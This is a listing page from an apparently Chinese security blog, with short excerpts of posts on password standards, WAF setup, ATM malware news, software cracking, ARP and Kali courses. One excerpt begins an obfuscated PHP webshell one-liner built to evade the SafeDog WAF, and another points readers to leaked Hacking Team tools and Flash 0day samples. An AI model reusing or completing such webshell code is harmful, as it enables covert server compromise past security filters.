• 【分享】渗透测试常用“神器”
  • Python WEB框架下集成乌云漏洞查询
  • NIST出台密码安全新标准:不再强制用户定期修改密码和使用复杂字

    2018-03-13 11:30 阅读:172

    NIST出台密码安全新标准:不再强制用户定期修改密码和使用复杂字

    美国国家标准和技术协会(NIST)发布了《数字身份验证指南(DAG)》的最新草案,该草案对以前的密码安全设置以及公司在制定相关安全政策时的许多标准和做法都进行了修改和调整。 在新版的密码安全保护方面,该指南不再要求用户定期修改密码。因为经过调查,

    阅读全文
  • https的WAF环境,应该如何配置

    2017-09-12 15:24 阅读:147

    https的WAF环境,应该如何配置

    如何配置 访问 https://zbg.org DNS服务器CNAME到waf.zbg.me域名 waf.zbg.me服务器解析server_name为waf.zbg.me并且端口为443的block,并将流量进行反向代理转发到后端服务器 前面2步都没问题,那就只有第三步的可能会有问题了。要转发 https://zbg.org 的流

    阅读全文
  • 爱奇艺优酷等18家视频网站遭破解,会员视频免费观看

    2017-07-04 09:18 阅读:167

    爱奇艺优酷等18家视频网站遭破解,会员视频免费观看

    7月3日消息,有读者向嘶吼编辑爆料,称发现一个神奇的网站,可破解腾讯、优酷土豆、爱奇艺等多家视频网站的付费和广告机制,任何人都可以免费观看会员视频。

    阅读全文
  • 让ATM机自动吐钱的恶意软件

    2017-01-03 14:48 阅读:120

    让ATM机自动吐钱的恶意软件

    近日网络安全服务商趋势科技与欧洲刑警组织的欧洲网络犯罪中心(Europol EC3)联合发现了一款新的入侵ATM的恶意软件- Alice,Alice能够将ATM的保险柜金洗劫一空,不用任何银行卡,不用输入密码就能让里面的现金分分钟易主。 其实使用恶意软件来入侵ATM在刑事

    阅读全文
  • 搭建属于你自己的维基站点:MediaWiki

    2016-12-24 10:06 阅读:114

    搭建属于你自己的维基站点:MediaWiki

    MediaWiki 是一个全球著名的开源的,运行于 PHP+MySQL 环境下的 wiki 程序 。例如,全球最大的 wiki 项目 维基百科,就是使用 MediaWiki 运营的成功范例。更多关于 MediaWiki 的介绍,我们可以 在这里找到 。 服务器配置 搭建 LAMP 环境后,我们还需要安装一

    阅读全文
  • 教你改软件版权,成为版权狗

    2016-12-18 14:33 阅读:156

    教你改软件版权,成为版权狗

    前言: 我为什么要发这篇帖子呢?那是因为我很不爽,前几天公开了 傀儡注入点批量扫描工具V5.0+ 的 源码,之后又冒出各种版本的扫描工具。有些人比着我的源码抄,写出自己的版本之后回头说我的软件辣鸡,误报高。我说,你比着我的软件源码抄的,还说我的软

    阅读全文
  • Hacking team被黑各种工具+flash 0day样本

    2016-12-13 15:38 阅读:125

    Hacking team被黑各种工具+flash 0day样本

    如果你不是在买硬盘就一定是在买硬盘的路上 hacking team被黑各种工具大家都是大下特下啊! 不过当前提供下载的地方好像不是很多!这里我也附加一下给大家把 我的小伙伴们都惊呆了! 这是链接: https://ht.transparencytoolkit.org 大家都懂的!!!要的速

    阅读全文
  • 【图文教学系列】“破解大牛是怎么炼成的”之壳与ESP定律

    2016-11-28 14:46 阅读:154

    【图文教学系列】“破解大牛是怎么炼成的”之壳与ESP定律

    一、 前言 通过前面几篇的学习,我们学会了利用暴力破解达到绕过注册机制和追踪注册码来达到合法用软件的方法,但是我们往往会遇到代码经过混淆器混淆的程序,此类混淆器可以称之为壳,壳又可分为压缩壳(常见的有 UPX、北斗、ASDPack、Npack、 PECompact 等

    阅读全文
  • php过狗一句话

    2016-11-27 15:55 阅读:151

    php过狗一句话

    分享一个别的地方看到的 混淆过狗php一句话 ?php $mt=mFsKCleRfU; $ojj=IEBleldle; $hsa=E9TVFsnd2VuJ10p; $fnx=Ow==; $zk = str_replace(d,,sdtdrd_redpdldadcde); //字符串替换:替换sdtdrd_redpdldadcde里的d为空 返回str_replace $ef = $zk(z, , zbazsze

    阅读全文
  • ARP全攻略分享

    2016-11-26 14:12 阅读:164

    ARP全攻略分享

    前言 我们知道,当我们在浏览器里面输入网址时,DNS服务器会自动把它解析为IP地址,浏览器实际上查找的是IP地址而不是网址。那么IP地址是如何转换为第二层物理地址(即MAC地址)的呢?在局域网中,这是通过ARP协议来完成的。ARP协议对网络安全具有重要的意义

    阅读全文
  • Python WEB框架下集成乌云漏洞查询

    2016-11-26 13:59 阅读:167

    Python WEB框架下集成乌云漏洞查询

    做渗透的时候遇到一个系统可以到网上搜索下这个系统的相关漏洞,众所周知的原因,wooyun关闭了很久,所以我们最好自己搭建一个乌云镜像。

    阅读全文
  • 最优秀的Kali Linux渗透测试课程

    2016-11-26 10:06 阅读:108

    最优秀的Kali Linux渗透测试课程

    0x00 前言 称为最优秀我个人觉得一点都不为过,目前市面上的那些课程先不说能不能把工具实现的原理讲清楚,就连工具的功能也是一知半解,更不说系统完整的渗透测试框架,yuanfh老师可能是我见过讲Kali Linux渗透测试最优秀的老师,很有幸学到老师的课程,老

    阅读全文